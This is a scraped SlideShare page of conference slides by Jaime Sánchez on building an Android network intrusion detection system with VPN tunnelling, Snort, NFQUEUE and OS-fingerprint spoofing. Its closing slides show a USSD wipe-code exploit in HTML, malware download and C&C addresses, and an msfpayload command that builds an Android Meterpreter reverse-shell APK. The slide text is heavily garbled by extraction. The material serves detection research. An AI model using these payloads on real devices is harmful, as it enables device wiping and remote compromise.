SlideShare ist ein Scribd-Unternehmen logo

ANDROIDS: MOBILE SECURITY RELOADED

Jaime Sánchez
Jaime Sánchez

This document provides an overview of building an Android intrusion detection system (IDS) to monitor network traffic on the device. It discusses setting up a VPN tunnel between the Android device and a computer to redirect all network packets from the kernel space to user space where tools like Snort can be used to analyze the traffic in real-time. It also covers ways to disguise the device operating system fingerprint through tools like OSFooler to prevent remote OS identification by scanners like Nmap. The goal is to develop a practical approach for detecting and analyzing malware and threats based on the device's network activity.

Technologie
1 von 47
Downloaden Sie, um offline zu lesen
ANDROIDS : MOBILE SECURITY RELOADED
ANDROIDS: MOBILE SECURITY RELOADED $"WHO"I"AM !"Passionate"about"computer"security. !"Computer"Engineering"degree"and"an"Execu7ve" MBA." !"I’m"from"Spain;"We’re"sexy"and"you"know"it. !"You"can"follow" my"adventures" at"@segofensiva" or"in"my"blog"h?p://www.seguridadofensiva.com !""Other"conferences: !"RootedCON"in"Spain !"Nuit"Du"Hack"in"Paris" !"Black"Hat"Arsenal"in"USA !"Defcon"in"USA !"... JAIME SÁNCHEZ (@SEGOFENSIVA) 2 DEEPSEC
BUILDING AN ANDROID IDS ON NETWORK LEVEL ANDROIDS: MOBILE SECURITY RELOADED MOTIVATIONS !" Smartphones" have" evolved" into" sophisGcated," compact"minicomputers !"Stores"sensiGve/private"informaGon"and"services !"Smartphones"usage"is"on"the"raise" !"SuscepGble"to"various"PCKlike"types"of"aLacks !" The" importance" of" security" mechanisms" is" not" yet"understood !"Security"mechanisms"are"not"sufficient !"Variety"of"plaOorms JAIME SÁNCHEZ (@SEGOFENSIVA) 3 DEFCON 21 DEEPSEC
BUILDING AN ANDROID IDS ON NETWORK LEVEL ANDROIDS: MOBILE SECURITY RELOADED WHY"ANDROID? !"Being"popular"is"not"always"a"good"thing. !"Mobile"malware"and"threats"are"clearly"on"the"rise. !"Over" 100" million"Android"phones" shipped"in"the"second"quarter" of"2012" alone. !""Targets"this"large"are"difficult"for"a?ackers"to"resist!" JAIME SÁNCHEZ (@SEGOFENSIVA) 4 DEFCON 21 DEEPSEC
BUILDING AN ANDROID IDS ON NETWORK LEVEL ANDROIDS: MOBILE SECURITY RELOADED THE"PLATFORM !" Android" has" inherited" powerful" base"systems"from"Linux"Kernel"such" as" the" memory" management," mulGtasking"and"file"management. !" Android" is" a" plaOorm" which" embraces" numerous" technologies" like" Linux" Kernel," C++," Java," Dalvik" VM,"etc. !" Android" has" a" processRunit" component" model" and" provides" system" func7ons" as" server" processes." For" a" funcGonal" meshKup" of" processes," it" provides"Binder. !"Why"has"a"new"mechanism"been"developed,"rather"than"using"(IPC),"such" as"sockets"and"pipes"provided"by"Linux?"It"is"because"of"performance. JAIME SÁNCHEZ (@SEGOFENSIVA) 5 DEFCON 21 DEEPSEC
BUILDING AN ANDROID IDS ON NETWORK LEVEL ANDROIDS: MOBILE SECURITY RELOADED SECURITY"ARCHITECTURE !" Android" seeks" to" be" the" most" secure" and" usable" operaGng" system" for" mobile" plaOorms" by" reKpurposing" tradiGonal" operaGng" system" security" controls"to: !"Protect"user"data !"Protect"system"resources"(including"the"network) !"Provide"applicaGon"isolaGon !"To"achieve"these"objecGves,"Android"provides"these"key"security"features: !"Robust"security"at"the"OS"level"through"the"Linux"kernel !"Mandatory"applicaGon"sandbox"for"all"applicaGons !"Secure"interprocess"communicaGon !"ApplicaGon"signing !"ApplicaGonKdefined"and"userKgranted"permissions !" Each" component" assumes" that" the" components" below" are" properly" secured. JAIME SÁNCHEZ (@SEGOFENSIVA) 6 DEFCON 21 DEEPSEC
THE"PROBLEM"? There is a massive growth in the volume of malware families and samples ... Google"Play’s"track"record"with"malware"is"not"too" good"(Bouncer"can"be"compromised)"...
THE"ONLY"PROBLEM"?
BUILDING AN ANDROID IDS ON NETWORK LEVEL ANDROIDS: MOBILE SECURITY RELOADED Android v1.0 CVE-2009-0475 (Remote code execution) CVE-2009-0606 (Privilege Escalation) CVE-2009-0607 (Multiple Integer Overflows) CVE-2009-0608 (Integer Overflow) CVE-2009-1895 (Privilege Escalation) CVE-2009-1754 (Access to Sensitive Information) CVE-2009-2348 (Access to Camera and Record Audio) CVE-2009-2656 (DoS through SMS) CVE-2009-2999 (DoS through SMS) CVE-2009-3698 (DoS through Dalvik API) CVE-2009-1185 (Privilege Escalation) CVE-2009-1186 (DoS through udev) Android v2.0 CVE-2009-1442 (Code Execution) CVE-2010-EASY (Privilege Escalation) CVE-2009-2692 (Privilege Escalation) CVE-2010-1807 (WebKitPrivilege Escalation) CVE-2010-1119 (WebKit Privilege Escalation) CVE-2011-1149 (Privilege Escalation) CVE-2011-3975 (Access to Sensitive Information) CVE-2011-2357 (Cross-Application Scripting) CVE-2011-0680 (Access to Sensitive Information) CVE-2011-2344 (Gain Privileges and Access Pictures) CVE-2011-1823 (Code Execution) JAIME SÁNCHEZ (@SEGOFENSIVA) Android v3.0 CVE-2010-4804 (Information Disclosure) CVE-2011-1823 (Privilege Escalation) CVE-2011-0640 (Code Execution) CVE-2011-1349 (DoS) CVE-2011-1350 (Privilege Escalation) CVE-2011-1352 (Privilege Escalation) CVE-2011-2343 (Access to Sensitive Information) CVE-2011-3874 (Privilege Escalation) CVE-2011-2357 (Bypass Permissions) 9 DEFCON 21 DEEPSEC
BUILDING AN ANDROID IDS ON NETWORK LEVEL ANDROIDS: MOBILE SECURITY RELOADED DIRTY"USSD Poor"SSL/TLS"implementaGons" KernelKmode"driver"exploits NFC"VulnerabiliGes Android"Master"Key ... !!!"METERPRETER"FOR" ANDROID"!!! JAIME SÁNCHEZ (@SEGOFENSIVA) 10 DEFCON 21 DEEPSEC
BUILDING AN ANDROID IDS ON NETWORK LEVEL ANDROIDS: MOBILE SECURITY RELOADED Mobile"Pwn2Own"2013 !" One" exploit" took"advantage" of" two" Chrome"on"Nexus"4"vulnerabiliGes"–" an" integer" overflow"that"affects" Chrome"and"another"Chrome" vulnerability"that"resulted"in"a"full" sandbox"escape"and"the"possibility"of"remote"code"execuGon"on"the"affected"device. !"Two"exploits"compromised"apps"that"are"installed"on"all"Samsung"Galaxy"S4"devices. JAIME SÁNCHEZ (@SEGOFENSIVA) 11 DEFCON 21 DEEPSEC
FIRST"APPROACH
BUILDING AN ANDROID IDS ON NETWORK LEVEL ANDROIDS: MOBILE SECURITY RELOADED VPN eth0:WiFi rmnet0: 3G snort tcpdump Internet gateway !"In"order"to"analyze"the"traffic"flows"we’ll"create"a"VPN"tunnel"between"our" Android"device"and"our"computer. !" The" VPN" tunnel" uses" digital" cerGficates" (public/private" key" pair)" to" authenGcate"the"client"and"the"server. !"Using"digital"cerGficates"instead"of"a"shared"key"gives"higher"flexibility,"for" instance"we"can"revoke"access"in"case"if"the"smartphone"is"lost. JAIME SÁNCHEZ (@SEGOFENSIVA) 13 DEFCON 21 DEEPSEC
BUILDING AN ANDROID IDS ON NETWORK LEVEL ANDROIDS: MOBILE SECURITY RELOADED !"Once"the"VPN"tunnel"is"established" and" the" traffic" is" being" sent" to" the" VPS," we" can" start" monitoring" the" traffic"with"snort. !" We" will" take" advantage" of" two" main"signatures:" official" rules" (the" registered" version" rules)" and" the" Emerging" Threats" (Emerging" Threats). !" We" can" also" use" tools" like" tcpdump" to" capture" traffic" for" later" analysis. !"Wireshark"gives"a"much"beLer"view"of"the"content"and"the"qualiGes" of"each"IP"datagram"or"the"TCP"segments JAIME SÁNCHEZ (@SEGOFENSIVA) 14 DEFCON 21 DEEPSEC
HELLO,"LOSER! JAIME SÁNCHEZ (@SEGOFENSIVA)
LIFE"CONTINUED
BUILDING AN ANDROID IDS ON NETWORK LEVEL ANDROIDS: MOBILE SECURITY RELOADED !" OSfooler" is" a" pracGcal" approach" presented" at" Black" Hat" Arsenal" USA" 2013. !" It" can" be" used" to" detect" and" defeat" acGve" and" passive" remote" OS" fingerprinGng"from"tools"like"nmap,"p0f"or"commercial"appliances. JAIME SÁNCHEZ (@SEGOFENSIVA) 17 DEFCON 21 DEEPSEC
FROM KERNEL How"i"met"your"packet From"kernel"Space"to"user"Heaven SPACE TO USER HEAVEN ANDROIDS: MOBILE SECURITY RELOADED NMAP"INTERNAL"PROBES Fingerprint Linux 2.6.17 - 2.6.24 Class Linux | Linux | 2.6.X | general purpose SEQ(SP=A5-D5%GCD=1-6%ISR=A7-D7%TI=Z%II=I%TS=U) OPS(O1=M400C%O2=M400C%O3=M400C%O4=M400C%O5=M400C%O6=M400C) WIN(W1=8018%W2=8018%W3=8018%W4=8018%W5=8018%W6=8018) ECN(R=Y%DF=Y%T=3B-45%TG=40%W=8018%O=M400C%CC=N%Q=) T1(R=Y%DF=Y%T=3B-45%TG=40%S=O%A=S+%F=AS%RD=0%Q=) T2(R=N) T3(R=Y%DF=Y%T=3B-45%TG=40%W=8018%S=O%A=S+%F=AS%O=M400C%RD=0%Q=) T4(R=Y%DF=Y%T=3B-45%TG=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=) T5(R=Y%DF=Y%T=3B-45%TG=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=) T6(R=Y%DF=Y%T=3B-45%TG=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=) T7(R=Y%DF=Y%T=3B-45%TG=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=) U1(DF=N%T=3B-45%TG=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G) IE(DFI=N%T=3B-45%TG=40%CD=S) Most"important: !"TCP"ISN"greatest"common"divisor"(GDC) !"TCP"IP"ID"sequence"generaGon"alg"(TI) !"TCP"Gmestamp"opGon"alg"(TS) !"TCP"OpGons"(O,"O1RO6) !"TCP"iniGal"Window"Size"(W,"W1RW6) !"Responsiveness"(R) !"IP"don’t"fragment"bit"(DF) !"IP"iniGal"GmeKtoKlive"guess"(TG) JAIME SÁNCHEZ (@SEGOFENSIVA) Although"there"are"others: !"TCP"ISN"counter"rate"(ISR) !"ICMP"IP"ID"sequence"generaGon"alg"(II) !"Shared"IP"ID"sequence"Boolean"(SS) !"Don’t"Fragment"ICMP"(DFI) !"Explicit"congesGon"noGficaGon"(C) !"TCP"miscellaneous"quirks"(Q) !"TCP"sequence"number"(S) !"etc. 18 NUIT DU HACK 2013 DEEPSEC
OSFOOLER: REMOTEMOBILE SECURITY RELOADED FROM KERNEL How"i"met"your"packet From"kernel"Space"to"user"Heaven ... SPACE TO USER OVER ANDROIDS: OS FINGERPRINTING ISHEAVEN P0F"SIGNATURES 8192:32:1:48:M*,N,N,S:.:Windows:98 Opera&ng)System ""K"Family ""K"Version Packet) Size Quirks """K"Data"in"SYN"packets """K"OpGons"arer"EOL """K"IP"ID"Field"="0 """K"ACK"different"to"0 """K"Unusual"flags """K"Incorrect"opGons"decode DF)Bit) Ini&al)TTL TCP)op&ons)and)order Window)Size """K"N:"NOP """K"E:"EOL """K"Wnnn:"WS """K"Mnnn:"MSS """K"S:"SACK """K"T"/"T0:"Timestamp"" """K"?n """K"*"Any"value """K"%nnn"nnn"MulGple """K"Sxx"MSS"MulGple """K"Txx"MTU"MulGple """K"xxx"Constant"value JAIME SANCHEZ (@SEGOFENSIVA) JAIME SÁNCHEZ (@SEGOFENSIVA) 16 19 NUIT DU HACK 2013 2013 BLACKHAT ARSENAL USA DEEPSEC
BUILDING AN ANDROID IDS ON NETWORK LEVEL ANDROIDS: MOBILE SECURITY RELOADED !" I" need" to" process" traffic" before" being"processed"inside"my"Android" device. !" I" can"redirect"all" network" packet" from"Kernel"Space"to"User"Space !"I"can"do"whatever"I"want"with"the" packets !"This"is"done"in"RealR7me. !" Runs" conGnuously" without" h u m a n" s u p e r v i s i o n" a n d" i s" completely"transparent"for"user. JAIME SÁNCHEZ (@SEGOFENSIVA) 20 DEFCON 21 DEEPSEC
I’VE"GOT"IT"!
FROM KERNEL How"i"met"your"packet From"kernel"Space"to"user"Heaven SPACE TO USER HEAVEN ANDROIDS: MOBILE SECURITY RELOADED !"Computer"operaGng"systems"provide" different"levels"of"access"to"resources. Ring"3 !"This"is"generally"hardwareKenforced"by" some"CPU"architectures"hat"provide" different"CPU"modes"at"the"hardware"or" microcode"level. Ring"2 Ring"1 Ring"0 Kernel !"Rings"are"arranged"in"a"hierarchy"from" most"privileged"(most"trusted,"usually" numbered"zero)"to"least"privileged"(least" trusted). Devices Devices Devices Less Privileged JAIME SÁNCHEZ (@SEGOFENSIVA) More Privileged !"On"most"operaGng"systems,"RING"0"is" the"level"with"the"most"privileges"and" interacts"most"directly"with"the"physical" hardware"such"as"the"CPU"and"memory. 22 NUIT DU HACK 2013 DEEPSEC
FROM KERNEL How"i"met"your"packet From"kernel"Space"to"user"Heaven SPACE TO USER HEAVEN ANDROIDS: MOBILE SECURITY RELOADED KERNEL"vs"USER"SPACE KERNEL"SPACE USER"SPACE KERNEL"SPACE)is)strictly)reserved)for)running)the)kernel,)kernel)extensions,)and)most)device) drivers.)In)contrast,)user) space)is)the)memory) area)where)all)user)mode)applica&ons)work) and)this)memory)can)be)swapped)out)when)necessary. Similarly,) the) term) USER" LAND) refers) to) all) applica&on) soKware) that) runs) in) user) space.) Userland)usually)refers)to)the)various)programs)and)libraries)that)the)opera&ng)system)uses) to)interact)with)the)kernel:) soKware) that) performs)input/output,) manipulates) file) system,) objects,)etc. JAIME SÁNCHEZ (@SEGOFENSIVA) 23 NUIT DU HACK 2013 DEEPSEC
FROM KERNEL How"i"met"your"packet From"kernel"Space"to"user"Heaven SPACE TO USER HEAVEN ANDROIDS: MOBILE SECURITY RELOADED WTF"!? JAIME SÁNCHEZ (@SEGOFENSIVA) 24 NUIT DU HACK 2013 DEEPSEC
OSFOOLER: REMOTEMOBILE SECURITY RELOADED From"kernel"Space"to"user"Heaven How"i"met"your"packet ANDROIDS: OS FINGERPRINTING IS OVER ... APPLICATION USER"SPACE read() TCP"recv"Buffer TCP"Process KERNEL"SPACE tcp_v4_rcv() Socket Backlog IP"Layer Pointer"to Device NIC ip_rcv() sorirq Internal Memory Packet"Data Interrupt Handler Poll"List Ring Buffer DEVICE"DRIVER Interrupt DMA"Engine NIC"Memory Incoming"Packet JAIME SANCHEZ (@SEGOFENSIVA) JAIME SÁNCHEZ (@SEGOFENSIVA) BLACKHAT ARSENAL USA 2013 DEEPSEC
OSFOOLER: REMOTEMOBILE SECURITY RELOADED FROM KERNEL How"i"met"your"packet From"kernel"Space"to"user"Heaven ... SPACE TO USER OVER ANDROIDS: OS FINGERPRINTING ISHEAVEN USER"SPACE APPLICATION read() TCP"recv"Buffer TCP"Process KERNEL"SPACE CONNTRACK Inbound"Packets MANGLE Socket Backlog PREROUTING FORWARD ip_rcv() IP"Layer forwarded"and"accepted"packets Pointer"to Device locally"desGned"packets"must"pass"the" INPUT"chains"to"reach"listening"sockets tcp_v4_rcv() FILTER NIC INPUT sorirq forwarded" packets Memory Kernel local packets Packet"Data Interrupt Handler Poll"List ConGnue"Processing Ring Buffer DEVICE"DRIVER Interrupt DMA"Engine NIC"Memory JAIME SANCHEZ (@SEGOFENSIVA) JAIME SÁNCHEZ (@SEGOFENSIVA) Incoming"Packet 27 NUIT DU HACK 2013 2013 BLACKHAT ARSENAL USA DEEPSEC
OSFOOLER: REMOTEMOBILE SECURITY RELOADED From"kernel"Space"to"user"Heaven How"i"met"your"packet ANDROIDS: OS FINGERPRINTING IS OVER ... APPLICATION USER"SPACE read() TCP"recv"Buffer TCP"Process KERNEL"SPACE tcp_v4_rcv() Socket Backlog IP"Layer Pointer"to Device NIC ip_rcv() sorirq Memory Kernel Packet"Data Interrupt Handler Poll"List Ring Buffer DEVICE"DRIVER Interrupt DMA"Engine NIC"Memory Incoming"Packet JAIME SANCHEZ (@SEGOFENSIVA) JAIME SÁNCHEZ (@SEGOFENSIVA) BLACKHAT ARSENAL USA 2013 DEEPSEC
OSFOOLER: REMOTEMOBILE SECURITY RELOADED From"kernel"Space"to"user"Heaven How"i"met"your"packet ANDROIDS: OS FINGERPRINTING IS OVER ... APPLICATION USER"SPACE read() TCP"recv"Buffer TCP"Process KERNEL"SPACE tcp_v4_rcv() Socket Backlog IP"Layer Pointer"to Device NIC ip_rcv() sorirq Memory Kernel Packet"Data Interrupt Handler Poll"List Ring Buffer DEVICE"DRIVER Interrupt DMA"Engine NIC"Memory Incoming"Packet JAIME SANCHEZ (@SEGOFENSIVA) JAIME SÁNCHEZ (@SEGOFENSIVA) BLACKHAT ARSENAL USA 2013 DEEPSEC
FROM KERNEL How"i"met"your"packet From"kernel"Space"to"user"Heaven SPACE TO USER HEAVEN ANDROIDS: MOBILE SECURITY RELOADED IPTABLES )A)target"extension"consists"of"a"KERNEL"MODULE,)and)an)op&onal)extension)to)iptables)to) provide)new)command)line)op&ons. There)are)several)extensions)in)the)default)NeRilter)distribu&on: JAIME SÁNCHEZ (@SEGOFENSIVA) 30 NUIT DU HACK 2013 DEEPSEC
FROM KERNEL How"i"met"your"packet From"kernel"Space"to"user"Heaven SPACE TO USER HEAVEN ANDROIDS: MOBILE SECURITY RELOADED QUEUE !)QUEUE)is)an)iptables)and)ip6tables)target)which)which)queues"the"packet"for"userspace" processing. !)For)this)to)be)useful,)two)further)components)are)required: • a)QUEUE"HANDLER)which)deals)with)the)actual)mechanics)of)passing)packets)between) the)kernel)and)userspace;)and • a)USERSPACE"APPLICATION)to)receive,)possibly)manipulate,)and)issue)verdicts)on) packets. !)The)default)value)for)the)maximum)queue)length)is)1024.)Once)this)limit)is)reached,)new) packets)will)be)dropped)un&l)the)length)of)the)queue)falls)below)the)limit)again.) $ iptables -A INPUT -j NFQUEUE --queue-num 0 JAIME SÁNCHEZ (@SEGOFENSIVA) 31 13 NUIT DU HACK 2013 DEEPSEC
ANDROIDS
How"i"met"your"packet BUILDING AN ANDROID IDS ON NETWORK LEVEL ANDROIDS: MOBILE SECURITY RELOADED The"logo"should"look"like"... JAIME SÁNCHEZ (@SEGOFENSIVA) DEFCON 21 DEEPSEC
How"i"met"your"packet BUILDING AN ANDROID IDS ON NETWORK LEVEL ANDROIDS: MOBILE SECURITY RELOADED PLEASE!"don't"make"decisions"at" night"in"Las"Vegas JAIME SÁNCHEZ (@SEGOFENSIVA) DEFCON 21 DEEPSEC
How"i"met"your"packet BUILDING AN ANDROID IDS ON NETWORK LEVEL ANDROIDS: MOBILE SECURITY RELOADED ANDROIDS !" Create" a" serious" open" source" networkKbased" intrusion" detecGon" system"(IDS)"and"networkKbased"intrusion"protecGon"system""(IPS)"has" the" ability" to"perform"realKGme" traffic"analysis"and" packet" logging" on" Internet"Protocol"(IP)"networks: !"It"should"feature: !"Protocol"analysis !"Content"searching !"Content"matching JAIME SÁNCHEZ (@SEGOFENSIVA) DEFCON 21 DEEPSEC
How"i"met"your"packet BUILDING AN ANDROID IDS ON NETWORK LEVEL ANDROIDS: MOBILE SECURITY RELOADED IDS"ARCHITECTURE:"SENSOR !" Runs" conGnuously" and" without" human" supervision,"featuring: !"Analyze"traffic !" Send"push"alerts" to"the" Android"device" in"order"to"warn"the"user"about"the"threat !"Report"to"Logging"Server"Custom !"Deploy"some"reacGve"acGons: !"Drop"specific"packet !"Add"new"rule"in"iptables"firewall !"Launch"script"/"module !" Sync" aLack" signatures" to" keep" them" updated. !"It"should"impose"minimal"overhead. JAIME SÁNCHEZ (@SEGOFENSIVA) DEFCON 21 DEEPSEC
How"i"met"your"packet BUILDING AN ANDROID IDS ON NETWORK LEVEL ANDROIDS: MOBILE SECURITY RELOADED IDS"ARCHITECTURE:"SERVER Web Interface Android Device Internet Firewall IDS"Server"& Database !" The" server" is" running" inside" a" Linux" Box," and" is" receiving" all" the" messages"the"Android"sensor"is"sending. !"Server"is"responsible"for: !"Send"signatures"to"remote"devices !"Store"events"in"database !"Detects"staGsGcal"anomalies"&"analysis"realKGme. JAIME SÁNCHEZ (@SEGOFENSIVA) DEFCON 21 DEEPSEC
How"i"met"your"packet BUILDING AN ANDROID IDS ON NETWORK LEVEL ANDROIDS: MOBILE SECURITY RELOADED MAYBE"ONE"DAY"... !" CollaboraGve" detecGon" and" detecGon" of" malware" propagaGon" paLerns"across"a"community"of"mobile"devices !"Evaluate"various"detecGon"algorithms !"Alert"about"a"detected"anomaly"when"it"persists !"More"reacGve"acGons: !"Uninstall"suspicious"applicaGon !"Kill"process !"Disconnect"radios !"Encrypt"data !"Monitor"system"calls"in"realKGme JAIME SÁNCHEZ (@SEGOFENSIVA) DEFCON 21 DEEPSEC
How"i"met"your"packet BUILDING AN ANDROID IDS ON NETWORK LEVEL ANDROIDS: MOBILE SECURITY RELOADED PROTOCOL"ANALYSIS LOOKS"LIKE"I"PICKED"THE"WRONG"WEEK TO"QUIT"SNIFFING"PACKETS JAIME SÁNCHEZ (@SEGOFENSIVA) DEFCON 21 DEEPSEC
How"i"met"your"packet BUILDING AN ANDROID IDS ON NETWORK LEVEL ANDROIDS: MOBILE SECURITY RELOADED " !"Packet"with"FIN,"SYN,"PUSH"and"URG"flags"acGve." !"Report"to"the"Central"Logger"and"DROP"the"packet. JAIME SÁNCHEZ (@SEGOFENSIVA) DEFCON 21 DEEPSEC
How"i"met"your"packet BUILDING AN ANDROID IDS ON NETWORK LEVEL ANDROIDS: MOBILE SECURITY RELOADED REMOTE"OS"FINGERPRINTING !"Detect"and"drop"packet"sent"from"wellKknown"scanning"tools. !"nmap"OS"fingerprinGng"works"by"sending"up"to"16"TCP,"UDP,"and"ICMP"probes" to"known"open"and"closed"ports"of"the"target"machine. SEQUENCE"GENERATION"(SEQ,"OPS,"WIN"&"T1) ICMP"ECHO"(IE) TCP"EXPLICIT"CONGESTION"NOTIFICATION"(ECN) TCP"T2RT7 UDP JAIME SÁNCHEZ (@SEGOFENSIVA) DEFCON 21 DEEPSEC
How"i"met"your"packet BUILDING AN ANDROID IDS ON NETWORK LEVEL ANDROIDS: MOBILE SECURITY RELOADED PATTERN"MATCHING I’M"WATCHING"YOU... JAIME SÁNCHEZ (@SEGOFENSIVA) DEFCON 21 DEEPSEC
How"i"met"your"packet BUILDING AN ANDROID IDS ON NETWORK LEVEL ANDROIDS: MOBILE SECURITY RELOADED SIGNATURE"FORMAT !"With"the"help"of"custom"build"signatures,"the"framework"can"also"be" used"to"detect"probes"or"aLacks"designed"for"mobile"devices " !"Useful"signatures"from"Snort"and"Emerging"Threats !"Convert"snortKlike"rules"to"a"friendly"format: JAIME SÁNCHEZ (@SEGOFENSIVA) DEFCON 21 DEEPSEC
MORE"EXAMPLES"!
How"i"met"your"packet BUILDING AN ANDROID IDS ON NETWORK LEVEL ANDROIDS: MOBILE SECURITY RELOADED Android"2.0"USERAFTERRFREE"REMOTE"CODE"EXECUTION !) Does)not)properly)validate) floa&ngpoint)data,) which)allows)remote) a]ackers) to)execute) arbitrary)code)or)cause)a)denial)of)service. !)Executed)via)craKed)HTML)document. JAIME SÁNCHEZ (@SEGOFENSIVA) DEFCON 21 DEEPSEC
How"i"met"your"packet BUILDING AN ANDROID IDS ON NETWORK LEVEL ANDROIDS: MOBILE SECURITY RELOADED USSD"EXPLOIT !"A" USSD" code" is"entered"into"phones" to"perform" acGons. !" They" are" mainly" used" by" network" operators" to" provide" customers" with" easy" access" to" preK configured"services,"including: !"callKforwarding !"balance"inquiries !"mulGple"SIM"funcGons. !"The"HTML"code"to"execute"such"an"acGon"is"as"follows: <a#href="tel:xyz">Click#here#to#call</a> !"Example"exploit: <frameset>#<frame#src="tel:*2767*3855#"#/>#</#frameset> JAIME SÁNCHEZ (@SEGOFENSIVA) DEFCON 21 DEEPSEC
How"i"met"your"packet BUILDING AN ANDROID IDS ON NETWORK LEVEL ANDROIDS: MOBILE SECURITY RELOADED MALWARE !"ANDR.TROJAN.SMSSEND !"Download"from: !"hxxp://adobeflashplayerEup.ru/?a=RANDOM_CHARACTERS"–"93.170.107.184" !"hxxp://googleplaynew.ru/?a=RANDOM_CHARACTERS"–"93.170.107.184 !"hxxp://browsernewEupdate.ru/?a=RANDOM_CHARACTERS"–"93.170.107.184 !"Once"executed,"connect"to"C&C:""gaga01.net/rq.php !oard=unknown;brand=generic;device=generic;imei=XXXXXX;imsi=XXXXXX;session_i d=1;operator=XXX;sms0=XXXXXX;sms1=XXXXXX;sms2=XXXXXX;]me=XXXXXX;]mezo ne=XXXXXX !"Search"paLern:"rq.php !"METERPRETER !""It"features"command"history,"tab"compleGon," channels,"and"more. !"Let’s"try: $#msfpayload#android/meterpreter/reverse_tcp#LHOST=192.168.0.20#R#>#meter.apk $#file#meter.apk# ###meter.apk:#Zip#archive#data,#at#least#v2.0#to#extract JAIME SÁNCHEZ (@SEGOFENSIVA) DEFCON 21 DEEPSEC
T H A N K Y O U! JAIME SÁNCHEZ (@SEGOFENSIVA) JSANCHEZ@SEGURIDADOFENSIVA.COM

Empfohlen

Hackers software
Hackers softwareHackers software
Hackers softwareSwati Sharma
 
Hacking Roman Codes with Mobile Phones
Hacking Roman Codes with Mobile PhonesHacking Roman Codes with Mobile Phones
Hacking Roman Codes with Mobile PhonesDavid Rogers
 
Why mobile-should-stop-worrying-learn-love-root-andrew-hoog-viaforensics-rsa-...
Why mobile-should-stop-worrying-learn-love-root-andrew-hoog-viaforensics-rsa-...Why mobile-should-stop-worrying-learn-love-root-andrew-hoog-viaforensics-rsa-...
Why mobile-should-stop-worrying-learn-love-root-andrew-hoog-viaforensics-rsa-...viaForensics
 
Stealth servers need Stealth Packets - Derbycon 3.0
Stealth servers need Stealth Packets - Derbycon 3.0Stealth servers need Stealth Packets - Derbycon 3.0
Stealth servers need Stealth Packets - Derbycon 3.0Jaime Sánchez
 
From Kernel Space to User Heaven
From Kernel Space to User HeavenFrom Kernel Space to User Heaven
From Kernel Space to User HeavenJaime Sánchez
 
From Kernel Space to User Heaven #NDH2k13
From Kernel Space to User Heaven #NDH2k13From Kernel Space to User Heaven #NDH2k13
From Kernel Space to User Heaven #NDH2k13Jaime Sánchez
 
Plataformas de mensajería y riesgos asociados: caso WhatsApp
Plataformas de mensajería y riesgos asociados: caso WhatsAppPlataformas de mensajería y riesgos asociados: caso WhatsApp
Plataformas de mensajería y riesgos asociados: caso WhatsAppJaime Sánchez
 
Whatsapp: mentiras y cintas de video RootedCON 2014
Whatsapp: mentiras y cintas de video RootedCON 2014Whatsapp: mentiras y cintas de video RootedCON 2014
Whatsapp: mentiras y cintas de video RootedCON 2014Jaime Sánchez
 

Empfohlen

Hackers software
Hackers softwareHackers software
Hackers softwareSwati Sharma
 
Hacking Roman Codes with Mobile Phones
Hacking Roman Codes with Mobile PhonesHacking Roman Codes with Mobile Phones
Hacking Roman Codes with Mobile PhonesDavid Rogers
 
Why mobile-should-stop-worrying-learn-love-root-andrew-hoog-viaforensics-rsa-...
Why mobile-should-stop-worrying-learn-love-root-andrew-hoog-viaforensics-rsa-...Why mobile-should-stop-worrying-learn-love-root-andrew-hoog-viaforensics-rsa-...
Why mobile-should-stop-worrying-learn-love-root-andrew-hoog-viaforensics-rsa-...viaForensics
 
Stealth servers need Stealth Packets - Derbycon 3.0
Stealth servers need Stealth Packets - Derbycon 3.0Stealth servers need Stealth Packets - Derbycon 3.0
Stealth servers need Stealth Packets - Derbycon 3.0Jaime Sánchez
 
From Kernel Space to User Heaven
From Kernel Space to User HeavenFrom Kernel Space to User Heaven
From Kernel Space to User HeavenJaime Sánchez
 
From Kernel Space to User Heaven #NDH2k13
From Kernel Space to User Heaven #NDH2k13From Kernel Space to User Heaven #NDH2k13
From Kernel Space to User Heaven #NDH2k13Jaime Sánchez
 
Plataformas de mensajería y riesgos asociados: caso WhatsApp
Plataformas de mensajería y riesgos asociados: caso WhatsAppPlataformas de mensajería y riesgos asociados: caso WhatsApp
Plataformas de mensajería y riesgos asociados: caso WhatsAppJaime Sánchez
 
Whatsapp: mentiras y cintas de video RootedCON 2014
Whatsapp: mentiras y cintas de video RootedCON 2014Whatsapp: mentiras y cintas de video RootedCON 2014
Whatsapp: mentiras y cintas de video RootedCON 2014Jaime Sánchez
 
Malicious Threats, Vulnerabilities and Defenses in WhatsApp and Mobile Instan...
Malicious Threats, Vulnerabilities and Defenses in WhatsApp and Mobile Instan...Malicious Threats, Vulnerabilities and Defenses in WhatsApp and Mobile Instan...
Malicious Threats, Vulnerabilities and Defenses in WhatsApp and Mobile Instan...Jaime Sánchez
 
Defeating WhatsApp’s Lack of Privacy
Defeating WhatsApp’s Lack of PrivacyDefeating WhatsApp’s Lack of Privacy
Defeating WhatsApp’s Lack of PrivacyJaime Sánchez
 
Mobile security
Mobile securityMobile security
Mobile securityhome
 
Mobile security
Mobile securityMobile security
Mobile securityBasant Kumar
 
ศิลปินในดวงใจ
ศิลปินในดวงใจศิลปินในดวงใจ
ศิลปินในดวงใจicesmurf
 
SIEM brochure A4 8pp FINAL WEB
SIEM brochure A4 8pp FINAL WEBSIEM brochure A4 8pp FINAL WEB
SIEM brochure A4 8pp FINAL WEBMerlin Govender
 
Deutsche Telekom Partnering Operating Alliance Summit - Zimperium
Deutsche Telekom Partnering Operating Alliance Summit - ZimperiumDeutsche Telekom Partnering Operating Alliance Summit - Zimperium
Deutsche Telekom Partnering Operating Alliance Summit - ZimperiumZimperium
 
Security As A Service
Security As A ServiceSecurity As A Service
Security As A Serviceguest536dd0e
 
How to Gather Global Mobile Threat Intelligence
How to Gather Global Mobile Threat IntelligenceHow to Gather Global Mobile Threat Intelligence
How to Gather Global Mobile Threat IntelligenceZimperium
 
Layer 7 Mobile Security Workshop with CA Technologies and Forrester Research ...
Layer 7 Mobile Security Workshop with CA Technologies and Forrester Research ...Layer 7 Mobile Security Workshop with CA Technologies and Forrester Research ...
Layer 7 Mobile Security Workshop with CA Technologies and Forrester Research ...CA API Management
 
Zimperium - Technology Briefing
Zimperium - Technology BriefingZimperium - Technology Briefing
